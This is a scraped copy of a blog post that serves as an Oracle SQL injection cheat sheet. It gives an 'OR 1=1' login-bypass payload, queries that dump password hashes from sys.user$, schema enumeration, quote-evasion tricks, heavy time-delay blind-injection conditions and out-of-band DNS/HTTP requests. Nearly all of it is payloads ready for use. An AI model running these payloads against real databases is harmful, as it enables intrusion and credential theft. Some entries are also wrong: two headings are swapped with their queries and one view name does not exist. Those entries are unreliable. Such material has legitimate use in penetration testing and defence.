zoukankan      html  css  js  c++  java
  • SQL Injection 字典

    Oracle

    Default Databases

    SYSTEM Available in all versions
    SYSAUX Available in all versions

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    -- SQL comment


    Example:

        • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

    Testing Version

    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

    Notes:

    • All SELECT statements in Oracle must contain a table.
    • dual is a dummy table which can be used for testing.

    Database Credentials

    SELECT username FROM all_users; Available on all versions
    SELECT name, password from sys.user$; Privileged, <= 10g
    SELECT name, spare4 from sys.user$; Privileged, <= 11g

    Database Names

    Current Database

    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance
    SELECT global_name FROM global_name
    SELECT SYS.DATABASE_NAME FROM DUAL

    User Databases

    SELECT DISTINCT owner FROM all_tables;

    Server Hostname

    SELECT host_name FROM v$instance; (Privileged)
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
    SELECT UTL_INADDR.get_host_address FROM dual;

    Tables and Columns

    Retrieving Tables

    SELECT table_name FROM all_tables;

    Retrieving Columns

    SELECT column_name FROM all_tab_columns;

    Find Tables from Column Name

    SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

    Find Columns From Table Name

    SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

    Retrieving Multiple Tables at once

    SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

    Avoiding the use of quotations

    Unlike other RDBMS, Oracle allows table/column names to be encoded.

    SELECT 0x09120911091 FROM dual; Hex Encoding.
    SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

    String Concatenation

    SELECT 'a'||'d'||'mi'||'n' FROM dual;

    Conditional Statements

    SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

    Timing

    Time Delay

    SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

    Heavy Time Delays

    AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

    Privileges

    SELECT privilege FROM session_privs;
    SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

    Out Of Band Channeling

    DNS Requests

    SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
    SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

    Password Cracking

    A Metasploit module for JTR can be found here.

  • 相关阅读:
    再次尝试windows下msys+MinGW编译ffmpeg
    iOS设备的硬件适配 (关于armv6, armv7, armv7s ) <转>
    vmware虚拟机下ubuntu 13.04使用zeranoe脚本交叉编译ffmpeg
    vmware 8下ubuntu 13.04安装vmware tools
    ubuntu下使用脚本交叉编译windows下使用的ffmpeg + X264
    网上看来的
    ffmpeg关于aac解码
    iOS阶段学习第15天笔记(NSDate操作)
    iOS阶段学习第15天笔记(NSDictionary与NSMutableDictionary 字典)
    iOS阶段学习第15天笔记(NSArray与NSMutableArray 数组)
  • 原文地址:https://www.cnblogs.com/shengxinking/p/3854266.html
Copyright © 2011-2022 走看看